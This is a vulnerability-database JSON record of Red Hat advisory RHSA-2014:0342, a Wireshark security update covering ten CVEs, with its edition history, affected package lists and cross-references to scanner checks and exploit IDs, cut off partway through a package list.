{"id": "RHSA-2014:0342", "hash": "b3d7102cd1a40336d59963fa17060332", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2014:0342) Moderate: wireshark security update", "description": "Wireshark is a network protocol analyzer. It is used to capture and browse\nthe traffic running on a computer network.\n\nTwo flaws were found in Wireshark. If Wireshark read a malformed packet off\na network or opened a malicious dump file, it could crash or, possibly,\nexecute arbitrary code as the user running Wireshark. (CVE-2014-2281,\nCVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could\ncrash or stop responding if it read a malformed packet off a network, or\nopened a malicious dump file. (CVE-2013-6336, CVE-2013-6337, CVE-2013-6338,\nCVE-2013-6339, CVE-2013-6340, CVE-2014-2283, CVE-2013-7112, CVE-2013-7114)\n\nAll Wireshark users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. All running instances\nof Wireshark must be restarted for the update to take effect.\n", "published": "2014-03-31T04:00:00", "modified": "2018-06-06T20:24:10", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://access.redhat.com/errata/RHSA-2014:0342", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2013-6336", "CVE-2013-6337", "CVE-2013-6338", "CVE-2013-6339", "CVE-2013-6340", "CVE-2013-7112", "CVE-2013-7114", "CVE-2014-2281", "CVE-2014-2283", "CVE-2014-2299"], "lastseen": "2019-08-13T18:45:29", "history": [{"bulletin": {"id": "RHSA-2014:0342", "hash": "", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2014:0342) Moderate: wireshark security update", "description": "Wireshark is a network protocol analyzer. It is used to capture and browse\nthe traffic running on a computer network.\n\nTwo flaws were found in Wireshark. If Wireshark read a malformed packet off\na network or opened a malicious dump file, it could crash or, possibly,\nexecute arbitrary code as the user running Wireshark. (CVE-2014-2281,\nCVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could\ncrash or stop responding if it read a malformed packet off a network, or\nopened a malicious dump file. (CVE-2013-6336, CVE-2013-6337, CVE-2013-6338,\nCVE-2013-6339, CVE-2013-6340, CVE-2014-2283, CVE-2013-7112, CVE-2013-7114)\n\nAll Wireshark users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. All running instances\nof Wireshark must be restarted for the update to take effect.\n", "published": "2014-03-31T04:00:00", "modified": "2017-03-03T17:21:02", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2014:0342", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2013-6336", "CVE-2013-6339", "CVE-2013-7114", "CVE-2013-6337", "CVE-2014-2281", "CVE-2014-2299", "CVE-2014-2283", "CVE-2013-7112", "CVE-2013-6340", "CVE-2013-6338"], "lastseen": "2017-03-05T09:18:37", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "affectedPackage": [{"arch": "s390", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.s390.rpm", "OSVersion": "6", "packageName": "wireshark-debuginfo", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "s390x", "packageFilename": "wireshark-1.8.10-7.el6_5.s390x.rpm", "OSVersion": "6", "packageName": "wireshark", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "s390x", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.s390x.rpm", "OSVersion": "6", "packageName": "wireshark-debuginfo", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "s390x", "packageFilename": "wireshark-devel-1.8.10-7.el6_5.s390x.rpm", "OSVersion": "6", "packageName": "wireshark-devel", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "src", "packageFilename": "wireshark-1.8.10-7.el6_5.src.rpm", "OSVersion": "6", "packageName": "wireshark", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "i686", "packageFilename": "wireshark-devel-1.8.10-7.el6_5.i686.rpm", "OSVersion": "6", "packageName": "wireshark-devel", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "x86_64", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.x86_64.rpm", "OSVersion": "6", "packageName": "wireshark-debuginfo", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "ppc", "packageFilename": "wireshark-devel-1.8.10-7.el6_5.ppc.rpm", "OSVersion": "6", "packageName": "wireshark-devel", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "x86_64", "packageFilename": "wireshark-gnome-1.8.10-7.el6_5.x86_64.rpm", "OSVersion": "6", "packageName": "wireshark-gnome", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "i686", "packageFilename": "wireshark-1.8.10-7.el6_5.i686.rpm", "OSVersion": "6", "packageName": "wireshark", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "ppc64", "packageFilename": "wireshark-gnome-1.8.10-7.el6_5.ppc64.rpm", "OSVersion": "6", "packageName": "wireshark-gnome", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "ppc64", "packageFilename": "wireshark-devel-1.8.10-7.el6_5.ppc64.rpm", "OSVersion": "6", "packageName": "wireshark-devel", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "s390x", "packageFilename": "wireshark-gnome-1.8.10-7.el6_5.s390x.rpm", "OSVersion": "6", "packageName": "wireshark-gnome", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "ppc", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.ppc.rpm", "OSVersion": "6", "packageName": "wireshark-debuginfo", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "ppc", "packageFilename": "wireshark-1.8.10-7.el6_5.ppc.rpm", "OSVersion": "6", "packageName": "wireshark", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "s390", "packageFilename": "wireshark-1.8.10-7.el6_5.s390.rpm", "OSVersion": "6", "packageName": "wireshark", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "ppc64", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.ppc64.rpm", "OSVersion": "6", "packageName": "wireshark-debuginfo", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "i686", "packageFilename": "wireshark-gnome-1.8.10-7.el6_5.i686.rpm", "OSVersion": "6", "packageName": "wireshark-gnome", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "i686", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.i686.rpm", "OSVersion": "6", "packageName": "wireshark-debuginfo", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "s390", "packageFilename": "wireshark-devel-1.8.10-7.el6_5.s390.rpm", "OSVersion": "6", "packageName": "wireshark-devel", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "x86_64", "packageFilename": "wireshark-devel-1.8.10-7.el6_5.x86_64.rpm", "OSVersion": "6", "packageName": "wireshark-devel", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "x86_64", "packageFilename": "wireshark-1.8.10-7.el6_5.x86_64.rpm", "OSVersion": "6", "packageName": "wireshark", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}, {"arch": "ppc64", "packageFilename": "wireshark-1.8.10-7.el6_5.ppc64.rpm", "OSVersion": "6", "packageName": "wireshark", "OS": "RedHat", "packageVersion": "1.8.10-7.el6_5", "operator": "lt"}]}, "lastseen": "2017-03-05T09:18:37", "differentElements": ["modified"], "edition": 1}, {"bulletin": {"id": "RHSA-2014:0342", "hash": "6a938489621fc5e3e7e300e999342681", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2014:0342) Moderate: wireshark security update", "description": "Wireshark is a network protocol analyzer. It is used to capture and browse\nthe traffic running on a computer network.\n\nTwo flaws were found in Wireshark. If Wireshark read a malformed packet off\na network or opened a malicious dump file, it could crash or, possibly,\nexecute arbitrary code as the user running Wireshark. (CVE-2014-2281,\nCVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could\ncrash or stop responding if it read a malformed packet off a network, or\nopened a malicious dump file. (CVE-2013-6336, CVE-2013-6337, CVE-2013-6338,\nCVE-2013-6339, CVE-2013-6340, CVE-2014-2283, CVE-2013-7112, CVE-2013-7114)\n\nAll Wireshark users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. All running instances\nof Wireshark must be restarted for the update to take effect.\n", "published": "2014-03-31T04:00:00", "modified": "2018-06-06T20:24:10", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2014:0342", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2013-6336", "CVE-2013-6337", "CVE-2013-6338", "CVE-2013-6339", "CVE-2013-6340", "CVE-2013-7112", "CVE-2013-7114", "CVE-2014-2281", "CVE-2014-2283", "CVE-2014-2299"], "lastseen": "2018-06-06T18:05:38", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "wireshark-debuginfo", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "src", "packageName": "wireshark", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-1.8.10-7.el6_5.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "wireshark-debuginfo", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "wireshark-devel", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-devel-1.8.10-7.el6_5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "wireshark-devel", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-devel-1.8.10-7.el6_5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "wireshark", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-1.8.10-7.el6_5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "wireshark-gnome", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-gnome-1.8.10-7.el6_5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "wireshark", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-1.8.10-7.el6_5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "wireshark-gnome", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-gnome-1.8.10-7.el6_5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "wireshark-debuginfo", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc", "packageName": "wireshark-debuginfo", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc", "packageName": "wireshark-devel", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-devel-1.8.10-7.el6_5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "wireshark-devel", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-devel-1.8.10-7.el6_5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc", "packageName": "wireshark", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-1.8.10-7.el6_5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "wireshark", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-1.8.10-7.el6_5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "wireshark-gnome", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-gnome-1.8.10-7.el6_5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "wireshark-debuginfo", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390", "packageName": "wireshark-debuginfo", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390", "packageName": "wireshark-devel", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-devel-1.8.10-7.el6_5.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "wireshark-devel", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-devel-1.8.10-7.el6_5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390", "packageName": "wireshark", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-1.8.10-7.el6_5.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "wireshark", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-1.8.10-7.el6_5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "wireshark-gnome", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-gnome-1.8.10-7.el6_5.s390x.rpm", "operator": "lt"}]}, "lastseen": "2018-06-06T18:05:38", "differentElements": ["affectedPackage"], "edition": 2}, {"bulletin": {"id": "RHSA-2014:0342", "hash": "e0de9a8afb95acdac2215e3cded9f871", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2014:0342) Moderate: wireshark security update", "description": "Wireshark is a network protocol analyzer. It is used to capture and browse\nthe traffic running on a computer network.\n\nTwo flaws were found in Wireshark. If Wireshark read a malformed packet off\na network or opened a malicious dump file, it could crash or, possibly,\nexecute arbitrary code as the user running Wireshark. (CVE-2014-2281,\nCVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could\ncrash or stop responding if it read a malformed packet off a network, or\nopened a malicious dump file. (CVE-2013-6336, CVE-2013-6337, CVE-2013-6338,\nCVE-2013-6339, CVE-2013-6340, CVE-2014-2283, CVE-2013-7112, CVE-2013-7114)\n\nAll Wireshark users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. All running instances\nof Wireshark must be restarted for the update to take effect.\n", "published": "2014-03-31T04:00:00", "modified": "2018-06-06T20:24:10", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2014:0342", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2013-6336", "CVE-2013-6337", "CVE-2013-6338", "CVE-2013-6339", "CVE-2013-6340", "CVE-2013-7112", "CVE-2013-7114", "CVE-2014-2281", "CVE-2014-2283", "CVE-2014-2299"], "lastseen": "2018-12-11T19:42:39", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "oraclelinux", "idList": ["ELSA-2014-0342"]}, {"type": "nessus", "idList": ["SL_20140331_WIRESHARK_ON_SL6_X.NASL", "ALA_ALAS-2014-330.NASL", "REDHAT-RHSA-2014-0342.NASL", "ORACLELINUX_ELSA-2014-0342.NASL", "CENTOS_RHSA-2014-0342.NASL", "FEDORA_2013-20985.NASL", "FEDORA_2013-20937.NASL", "SOLARIS11_WIRESHARK_20131217.NASL", "OPENSUSE-2013-848.NASL", "WIRESHARK_1_8_11.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310123434", "OPENVAS:1361412562310881913", "OPENVAS:1361412562310120046", "OPENVAS:881913", "OPENVAS:1361412562310871149", "OPENVAS:871149", "OPENVAS:1361412562310867053", "OPENVAS:867053", "OPENVAS:1361412562310867039", "OPENVAS:867039"]}, {"type": "amazon", "idList": ["ALAS-2014-330"]}, {"type": "centos", "idList": ["CESA-2014:0342"]}, {"type": "cve", "idList": ["CVE-2013-6336", "CVE-2013-7114", "CVE-2013-6337", "CVE-2013-6339", "CVE-2013-6338", "CVE-2013-7112", "CVE-2013-6340", "CVE-2014-2281", "CVE-2014-2299", "CVE-2014-2283"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2792-1:C62D2", "DEBIAN:DSA-2871-1:4BB93", "DEBIAN:DSA-2825-1:6CAB0"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30015", "SECURITYVULNS:DOC:30359", "SECURITYVULNS:VULN:13602", "SECURITYVULNS:VULN:13309", "SECURITYVULNS:DOC:30134", "SECURITYVULNS:VULN:13466"]}, {"type": "gentoo", "idList": ["GLSA-201312-13", "GLSA-201406-33"]}, {"type": "seebug", "idList": ["SSV:61892", "SSV:61893", "SSV:61890", "SSV:86324"]}, {"type": "zdt", "idList": ["1337DAY-ID-22187"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:126337"]}, {"type": "exploitdb", "idList": ["EDB-ID:33069"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/WIRESHARK_MPEG_OVERFLOW"]}, {"type": "kaspersky", "idList": ["KLA10588"]}], "modified": "2018-12-11T19:42:39"}}, "objectVersion": "1.4", "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "wireshark-debuginfo", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.i686.rpm", "operator": "lt"}]}, "lastseen": "2018-12-11T19:42:39", "differentElements": ["cvss"], "edition": 3}, {"bulletin": {"id": "RHSA-2014:0342", "hash": "25a70c4b3cbfda0ff968b7209d987db9", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2014:0342) Moderate: wireshark security update", "description": "Wireshark is a network protocol analyzer. It is used to capture and browse\nthe traffic running on a computer network.\n\nTwo flaws were found in Wireshark. If Wireshark read a malformed packet off\na network or opened a malicious dump file, it could crash or, possibly,\nexecute arbitrary code as the user running Wireshark. (CVE-2014-2281,\nCVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could\ncrash or stop responding if it read a malformed packet off a network, or\nopened a malicious dump file. (CVE-2013-6336, CVE-2013-6337, CVE-2013-6338,\nCVE-2013-6339, CVE-2013-6340, CVE-2014-2283, CVE-2013-7112, CVE-2013-7114)\n\nAll Wireshark users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. All running instances\nof Wireshark must be restarted for the update to take effect.\n", "published": "2014-03-31T04:00:00", "modified": "2018-06-06T20:24:10", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://access.redhat.com/errata/RHSA-2014:0342", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2013-6336", "CVE-2013-6337", "CVE-2013-6338", "CVE-2013-6339", "CVE-2013-6340", "CVE-2013-7112", "CVE-2013-7114", "CVE-2014-2281", "CVE-2014-2283", "CVE-2014-2299"], "lastseen": "2019-05-29T14:34:01", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 8.6, "vector": "NONE", "modified": "2019-05-29T14:34:01"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:871149", "OPENVAS:1361412562310123434", "OPENVAS:867039", "OPENVAS:881913", "OPENVAS:1361412562310871149", "OPENVAS:1361412562310881913", "OPENVAS:1361412562310120046", "OPENVAS:867053", "OPENVAS:1361412562310867053", "OPENVAS:1361412562310867039"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2014-0342.NASL", "SL_20140331_WIRESHARK_ON_SL6_X.NASL", "FEDORA_2013-20829.NASL", "SUSE_11_WIRESHARK-131106.NASL", "MANDRIVA_MDVSA-2013-279.NASL", "WIRESHARK_1_10_3.NASL", "REDHAT-RHSA-2014-0342.NASL", "ORACLELINUX_ELSA-2014-0342.NASL", "ALA_ALAS-2014-330.NASL", "FEDORA_2013-20985.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-0342"]}, {"type": "amazon", "idList": ["ALAS-2014-330"]}, {"type": "centos", "idList": ["CESA-2014:0342"]}, {"type": "cve", "idList": ["CVE-2013-6336", "CVE-2013-7114", "CVE-2013-6339", "CVE-2013-6337", "CVE-2013-6338", "CVE-2013-7112", "CVE-2013-6340", "CVE-2014-2281", "CVE-2014-2299", "CVE-2014-2283"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30015", "SECURITYVULNS:VULN:13602", "SECURITYVULNS:DOC:30359", "SECURITYVULNS:VULN:13309", "SECURITYVULNS:DOC:30134", "SECURITYVULNS:VULN:13466"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2792-1:C62D2", "DEBIAN:DSA-2871-1:4BB93", "DEBIAN:DSA-2825-1:6CAB0"]}, {"type": "gentoo", "idList": ["GLSA-201312-13", "GLSA-201406-33"]}, {"type": "seebug", "idList": ["SSV:61892", "SSV:61890", "SSV:61893", "SSV:86324"]}, {"type": "zdt", "idList": ["1337DAY-ID-22187"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:126337"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/WIRESHARK_MPEG_OVERFLOW"]}, {"type": "exploitdb", "idList": ["EDB-ID:33069"]}, {"type": "kaspersky", "idList": ["KLA10588"]}], "modified": "2019-05-29T14:34:01"}}, "objectVersion": "1.4", "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "wireshark-debuginfo", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.i686.rpm", "operator": "lt"}]}, "lastseen": "2019-05-29T14:34:01", "differentElements": ["affectedPackage"], "edition": 4}], "viewCount": 4, "enchantments": {"score": {"value": 8.6, "vector": "NONE", "modified": "2019-08-13T18:45:29", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310120046", "OPENVAS:1361412562310867039", "OPENVAS:1361412562310871149", "OPENVAS:867053", "OPENVAS:871149", "OPENVAS:1361412562310881913", "OPENVAS:1361412562310123434", "OPENVAS:1361412562310867053", "OPENVAS:867039", "OPENVAS:881913"]}, {"type": "nessus", "idList": ["SL_20140331_WIRESHARK_ON_SL6_X.NASL", "ORACLELINUX_ELSA-2014-0342.NASL", "MANDRIVA_MDVSA-2013-279.NASL", "REDHAT-RHSA-2014-0342.NASL", "CENTOS_RHSA-2014-0342.NASL", "ALA_ALAS-2014-330.NASL", "WIRESHARK_1_10_3.NASL", "SUSE_11_WIRESHARK-131106.NASL", "OPENSUSE-2013-848.NASL", "FEDORA_2013-20829.NASL"]}, {"type": "centos", "idList": ["CESA-2014:0341", "CESA-2014:0342"]}, {"type": "amazon", "idList": ["ALAS-2014-330"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-0342"]}, {"type": "cve", "idList": ["CVE-2013-6340", "CVE-2014-2283", "CVE-2013-7112", "CVE-2013-6339", "CVE-2013-6338", "CVE-2014-2281", "CVE-2013-7114", "CVE-2013-6336", "CVE-2013-6337", "CVE-2014-2299"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13309", "SECURITYVULNS:DOC:30359", "SECURITYVULNS:VULN:13602", "SECURITYVULNS:VULN:13466", "SECURITYVULNS:DOC:30015", "SECURITYVULNS:DOC:30134"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2792-1:C62D2", "DEBIAN:DSA-2871-1:4BB93", "DEBIAN:DSA-2825-1:6CAB0"]}, {"type": "gentoo", "idList": ["GLSA-201406-33", "GLSA-201312-13"]}, {"type": "seebug", "idList": ["SSV:61893", "SSV:86324", "SSV:61892", "SSV:61890"]}, {"type": "kaspersky", "idList": ["KLA10588"]}, {"type": "zdt", "idList": ["1337DAY-ID-22187"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/WIRESHARK_MPEG_OVERFLOW"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:126337"]}, {"type": "exploitdb", "idList": ["EDB-ID:33069"]}], "modified": "2019-08-13T18:45:29", "rev": 2}, "vulnersScore": 8.6}, "objectVersion": "1.4", "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "wireshark-debuginfo", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "wireshark-gnome", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-gnome-1.8.10-7.el6_5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc", "packageName": "wireshark-devel", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-devel-1.8.10-7.el6_5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "wireshark-gnome", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-gnome-1.8.10-7.el6_5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "wireshark-devel", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-devel-1.8.10-7.el6_5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390", "packageName": "wireshark", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-1.8.10-7.el6_5.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390", "packageName": "wireshark-debuginfo", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "wireshark-gnome", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-gnome-1.8.10-7.el6_5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "wireshark-gnome", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-gnome-1.8.10-7.el6_5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "src", "packageName": "wireshark", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-1.8.10-7.el6_5.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "wireshark-debuginfo", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "wireshark-devel", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-devel-1.8.10-7.el6_5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "wireshark-devel", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-devel-1.8.10-7.el6_5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "wireshark", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-1.8.10-7.el6_5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "wireshark-devel", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-devel-1.8.10-7.el6_5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "wireshark", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-1.8.10-7.el6_5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "wireshark-debuginfo", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc", "packageName": "wireshark-debuginfo", "packageVersion": "1.8.10-7.el6_5", 